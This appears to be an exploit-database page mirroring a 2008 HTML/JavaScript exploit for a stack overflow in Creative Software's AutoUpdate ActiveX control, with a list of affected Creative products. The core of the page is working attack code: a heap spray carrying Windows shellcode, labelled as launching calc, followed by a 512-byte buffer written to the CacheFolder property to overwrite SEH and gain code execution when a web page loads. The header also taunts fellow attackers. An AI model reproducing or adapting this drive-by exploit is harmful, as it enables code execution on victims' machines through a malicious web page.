Vulners
Lucene search
creative-overflow.txt
`<html>
<!--
!!!NOT PRIVATE PLEASE DISTRIBUTE!!!
Zer0Day Creative Software AutoUpdate Engine ActiveX Stack-Overflow (CacheFolder) Exploit by BitKrush <BitKrush +A.T.+ G.M.A.I.L.D.0.T.C.0.M.>
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
CacheFolder property is vulnerable to stack-based buffer overflow after 260 bytes, @ 512 bytes overwrites SEH and allows code execution reliably.
Original Advisory @ http://www.kb.cert.org/vuls/id/501843 and Vulnerability Discovered by Greg Linares of eEye Digital Security
ActiveX Download @ http://www.creative.com/su/Product.asp
MAXIMUM RESPECT TO RGOD (RIP) - A TRUE INSPIRATION
Greetz to KCOPE, ELAZAR, H07, MATTEO, SHINNAI, AURIEMMA and to all the 2008 .CN/.RU/.JP/.* SQL INJECTORS - HAVE FUN WITH THIS YOU BASTARDS!
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Tested On Windows XP SP3 with all patches (like that matters)
Products Affected:
the below Creative Labs Software and Hardware depends on this ActiveX for updates and comes shipped with it or is supported by the control:
Sound cards
Audigy
Audigy 2
Audigy 2 LS
Audigy 2 NX
Audigy 2 Platinum
Audigy 2 Platinum eX
Audigy 2 Value
Audigy 2 ZS
Audigy 2 ZS Gamer
Audigy 2 ZS Notebook
Audigy 2 ZS Platinum
Audigy 2 ZS Platinum Pro
Audigy 2 ZS Video Editor
Audigy 4 Pro
Audigy Gamer
Audigy LS
Audigy MP3+
Audigy Platinum
Audigy Platinum eX
Live! 24-bit
Live! 24-bit External
Live! 5.1
Live! 5.1 Digital (Dell)
Live! ADVANCED MB
MP3 +
Sound Blaster Audigy 2 ZS Digital Audio
Sound Blaster Audigy ADVANCED MB
Sound Blaster X-Fi Fatal1ty
Wireless Music
X-Fi Elite Pro
X-Fi Platinum
X-Fi XtremeMusic
USB Sound Blaster
Audigy 2 NX
MP3 +
Portable Audio
MuVo
MuVo NX
MuVo Slim
MuVo TX
MuVo TX FM
MuVo² X-Trainer
MuVo²
MuVo² FM
NOMAD II 32MB
NOMAD II MG
NOMAD IIc
NOMAD Jukebox 3
NOMAD Jukebox ZEN
Rhomba
Portable Media Players
ZEN Portable Media Center
ZEN Vision 30GB
MP3 Players
MuVo
MuVo 2.0 / MuVo Mix
MuVo Micro
MuVo NX
MuVo Slim
MuVo Sport C100
MuVo TX
MuVo TX FM
MuVo V200
MuVo² X-Trainer
MuVo²
MuVo² FM
NOMAD II 32MB
NOMAD II MG
NOMAD II MG Limited Edition
NOMAD IIc
NOMAD JukeBox
NOMAD Jukebox 10GB
NOMAD Jukebox 2
NOMAD Jukebox 3
NOMAD Jukebox C
NOMAD Jukebox ZEN
NOMAD Jukebox ZEN NX
NOMAD Jukebox ZEN USB 2.0
Rhomba
ZEN 20GB
ZEN Micro
ZEN Nano 512MB
ZEN Nano Plus
ZEN Neeon 5GB/6GB
ZEN Portable Media Center
ZEN Sleek
ZEN Touch
ZEN Vision 30GB
ZEN Xtra
Web Cameras
Creative PC-CAM 900
Creative WebCam Vista
Game Star
Live! Ultra for Notebooks
PC-CAM 880
WebCam Instant
WebCam Instant
WebCam Live!
WebCam Live! Pro
WebCam Live! Ultra
WebCam Notebook
WebCam NX
WebCam NX Pro
WebCam NX Ultra
WebCam Vista
Video
Audigy 2 ZS Video Editor
Wireless
Wireless Music
Notebook Products
Audigy 2 NX
Audigy 2 ZS Notebook
Live! 24-bit External
Live! Ultra for Notebooks
MP3 +
WebCam Notebook
Software
Game Star
http://us.creative.com/support/downloads/popup_supportproducts.asp
Google: http://www.google.com/search?q=0A5FD7C5-A45C-49FC-ADB5-9952547D5715&btnG=Search
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
ActiveX CLSID = 0A5FD7C5-A45C-49FC-ADB5-9952547D5715
KILL BIT THIS ^^
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
-->
<object classid='clsid:0A5FD7C5-A45C-49FC-ADB5-9952547D5715' id='obj1'></object>
<script language='javascript'>
var sc01 = unescape("%u9090%u9090"+ //Windows Execute Command (calc)
"%ue8fcD%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b"+
"%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca"+
"%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b"+
"%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%uc031%u8b64%u3040"+
"%uc085%u0c78%u408b%u8b0c%u1c70%u8bad%u0868%u09eb%u808b%u00b0"+
"%u0000%u688b%u5f3c%uf631%u5660%uf889%uc083%u507b%uf068%u048a"+
"%u685f%ufe98%u0e8a%uff57%u63e7%u6c61c");
var mainblk = unescape("%u0c0c%u0c0c");
var hdr = 20;
var slck = hdr + sc01.length;
while (mainblk.length < slck) mainblk += mainblk;
var fillblk = mainblk.substring(0,slck);
var blk = mainblk.substring(0,mainblk.length - slck);
while (blk.length + slck < 0x40000) blk = blk + blk + fillblk;
var memory = new Array();
for (i = 0; i < 400; i++){ memory[i] = blk + sc01 }
var buf = '';
while (buf.length < 512) buf = buf + unescape("%09"); // TAB - 0x09 works best here.
obj1.cachefolder = buf;
</script>
</html>
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
29 May 2008 00:00Current
7.4High risk
Vulners AI Score7.4